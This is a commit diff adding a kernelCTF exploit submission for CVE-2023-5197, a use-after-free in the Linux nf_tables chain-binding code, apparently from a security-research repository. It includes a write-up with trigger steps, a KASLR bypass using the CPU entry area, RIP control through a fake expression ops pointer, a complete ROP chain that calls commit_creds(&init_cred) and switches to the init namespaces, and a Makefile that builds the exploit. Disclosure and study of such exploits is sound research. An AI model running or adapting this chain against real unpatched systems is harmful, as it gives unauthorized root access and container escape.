Add kernelCTF CVE-2023-5197_mitigation (#122)

* Add kernelCTF CVE-2023-5197_mitigation

* update exploit

* update exploit

* update exploit

---------

Co-authored-by: Mingi Cho <[email protected]>

Author: mingi

pocs/linux/kernelctf/CVE-2023-5197_mitigation/docs/exploit.md

@@ -0,0 +1,221 @@
+# Overview
+
+This vulnerability was discovered by Kevin Rich, and his write-up targeting the LTS/COS kernel can be found [here](https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2023-5197_lts_cos).
+
+```c
+static void nft_immediate_chain_deactivate(const struct nft_ctx *ctx,
+                       struct nft_chain *chain,
+                       enum nft_trans_phase phase)
+{
+    struct nft_ctx chain_ctx;
+    struct nft_rule *rule;
+
+    chain_ctx = *ctx;
+    chain_ctx.chain = chain;
+
+    list_for_each_entry(rule, &chain->rules, list)
+        nft_rule_expr_deactivate(&chain_ctx, rule, phase);
+}
+
+static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+                     const struct nft_expr *expr,
+                     enum nft_trans_phase phase)
+{
+    const struct nft_immediate_expr *priv = nft_expr_priv(expr);
+    const struct nft_data *data = &priv->data;
+    struct nft_chain *chain;
+
+    if (priv->dreg == NFT_REG_VERDICT) {
+        switch (data->verdict.code) {
+        case NFT_JUMP:
+        case NFT_GOTO:
+            chain = data->verdict.chain;
+            if (!nft_chain_binding(chain))
+                break;
+
+            switch (phase) {
+            case NFT_TRANS_PREPARE_ERROR:
+                nf_tables_unbind_chain(ctx, chain);
+                nft_deactivate_next(ctx->net, chain);
+                break;
+            case NFT_TRANS_PREPARE:
+                nft_immediate_chain_deactivate(ctx, chain, phase);      // [1]
+                nft_deactivate_next(ctx->net, chain);
+                break;
+            default:
+                nft_immediate_chain_deactivate(ctx, chain, phase);
+                nft_chain_del(chain);
+                chain->bound = false;
+                nft_use_dec(&chain->table->use);
+                break;
+            }
+            break;
+        default:
+            break;
+        }
+    }
+
+    if (phase == NFT_TRANS_COMMIT)
+        return;
+
+    return nft_data_release(&priv->data, nft_dreg_to_type(priv->dreg));     // [2]
+}
+```
+
+The vulnerability is caused by being able to delete the rules of a chain with the binding flag set. To trigger the vulnerability, create a vulnerable chain with the binding flag set. Then, create an immediate expr in the vulnerable chain that references the victim chain, and then delete the immediate expr. As a result, the reference count of the victim chain is decreased [2]. Then, creating an immediate expr that references the vulnerable chain and deleting it causes the already deactivated rule in the vulnerable chain to be deactivated again [1]. As a result, the reference count of the victim chain is decreased twice.
+
+# KASLR Bypass and Information Leak
+
+To bypass KASLR, I used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.
+
+# RIP Control
+
+```c
+struct nft_chain {
+	struct nft_rule_blob		__rcu *blob_gen_0;
+	struct nft_rule_blob		__rcu *blob_gen_1;
+	struct list_head		rules;
+	struct list_head		list;
+	struct rhlist_head		rhlhead;
+	struct nft_table		*table;
+	u64				handle;
+	u32				use;
+	u8				flags:5,
+					bound:1,
+					genmask:2;
+	char				*name;
+	u16				udlen;
+	u8				*udata;
+
+	/* Only used during control plane commit phase: */
+	struct nft_rule_blob		*blob_next;
+};
+```
+
+When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`.
+
+```c
+unsigned int
+nft_do_chain(struct nft_pktinfo *pkt, void *priv)
+{
+	...
+do_chain:
+	if (genbit)
+		blob = rcu_dereference(chain->blob_gen_1);
+	else
+		blob = rcu_dereference(chain->blob_gen_0);
+
+	rule = (struct nft_rule_dp *)blob->data;
+	last_rule = (void *)blob->data + blob->size;
+next_rule:
+	regs.verdict.code = NFT_CONTINUE;
+	for (; rule < last_rule; rule = nft_rule_next(rule)) {
+		nft_rule_dp_for_each_expr(expr, last, rule) {
+			if (expr->ops == &nft_cmp_fast_ops)
+				nft_cmp_fast_eval(expr, &regs);
+			else if (expr->ops == &nft_cmp16_fast_ops)
+				nft_cmp16_fast_eval(expr, &regs);
+			else if (expr->ops == &nft_bitwise_fast_ops)
+				nft_bitwise_fast_eval(expr, &regs);
+			else if (expr->ops != &nft_payload_fast_ops ||
+				 !nft_payload_fast_eval(expr, &regs, pkt))
+				expr_call_ops_eval(expr, &regs, pkt);
+
+			if (regs.verdict.code != NFT_CONTINUE)
+				break;
+		}
+```
+
+```c
+static void expr_call_ops_eval(const struct nft_expr *expr,
+			       struct nft_regs *regs,
+			       struct nft_pktinfo *pkt)
+{
+#ifdef CONFIG_RETPOLINE
+	unsigned long e = (unsigned long)expr->ops->eval;
+#define X(e, fun) \
+	do { if ((e) == (unsigned long)(fun)) \
+		return fun(expr, regs, pkt); } while (0)
+
+	X(e, nft_payload_eval);
+	X(e, nft_cmp_eval);
+	X(e, nft_counter_eval);
+	X(e, nft_meta_get_eval);
+	X(e, nft_lookup_eval);
+	X(e, nft_range_eval);
+	X(e, nft_immediate_eval);
+	X(e, nft_byteorder_eval);
+	X(e, nft_dynset_eval);
+	X(e, nft_rt_get_eval);
+	X(e, nft_bitwise_eval);
+#undef  X
+#endif /* CONFIG_RETPOLINE */
+	expr->ops->eval(expr, regs, pkt);
+}
+```
+
+`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP and allocate the fake blob object larger than 0x2000 to use page allocator.
+
+# Post-RIP
+
+The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator.
+
+```c
+void rop_chain(uint64_t* data){
+    int i = 0;
+
+    data[i++] = 0x100;
+    data[i++] = 0x100;
+    data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
+
+    // current = find_task_by_vpid(getpid())
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = getpid();
+    data[i++] = kbase + FIND_TASK_BY_VPID;
+
+    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = RCU_READ_LOCK_NESTING_OFF;
+    data[i++] = kbase + ADD_RAX_RSI_RET;
+
+    // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+    data[i++] = kbase + POP_RCX_RET;
+    data[i++] = 0;
+    data[i++] = kbase + MOV_RAX_RCX_RET;
+
+    // Bypass "schedule while atomic": set oops_in_progress = 1
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = 1;
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = kbase + OOPS_IN_PROGRESS;
+    data[i++] = kbase + MOV_RSI_RDI_RET;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = kbase + INIT_CRED;
+    data[i++] = kbase + COMMIT_CREDS;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = 1;
+    data[i++] = kbase + FIND_TASK_BY_VPID;
+
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = 0;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + MOV_RDI_RAX_RET;
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = kbase + INIT_NSPROXY;
+    data[i++] = kbase + SWITCH_TASK_NAMESPACES;
+
+    data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
+    data[i++] = 0;
+    data[i++] = 0;
+    data[i++] = _user_rip;
+    data[i++] = _user_cs;
+    data[i++] = _user_rflags;
+    data[i++] = _user_sp;
+    data[i++] = _user_ss;
+}
+```

pocs/linux/kernelctf/CVE-2023-5197_mitigation/docs/vulnerability.md

@@ -0,0 +1,12 @@
+- Requirements:
+	- Capabilities: CAP_NET_ADMIN
+	- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
+	- User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d0e2c7de92c7 (netfilter: nf_tables: add NFT_CHAIN_BINDING)
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f15f29fd4779be8a418b66e9d52979bb6d6c2325 (netfilter: nf_tables: disallow rule removal from chain binding)
+- Affected Version: v5.9-rc1 - v6.6-rc2
+- Affected Component: net/netfilter
+- Cause: Use-After-Free
+- Syscall to disable: disallow unprivileged username space
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-5197
+- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. Addition and removal of rules from chain bindings within the same transaction causes leads to use-after-free. We recommend upgrading past commit f15f29fd4779be8a418b66e9d52979bb6d6c2325.

pocs/linux/kernelctf/CVE-2023-5197_mitigation/exploit/mitigation-v3-6.1.55/Makefile

@@ -0,0 +1,35 @@
+LIBMNL_DIR = $(realpath ./)/libmnl_build
+LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
+
+exploit:
+	gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s
+
+prerequisites: libmnl-build libnftnl-build
+
+libmnl-build : libmnl-download
+	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
+
+libnftnl-build : libmnl-build libnftnl-download
+	tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
+
+libmnl-download :
+	mkdir $(LIBMNL_DIR)
+	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 
+	
+libnftnl-download :
+	mkdir $(LIBNFTNL_DIR)
+	wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
+
+run:
+	./exploit
+
+clean:
+	rm -rf $(LIBMNL_DIR)
+	rm -rf $(LIBNFTNL_DIR)
+	rm -f exploit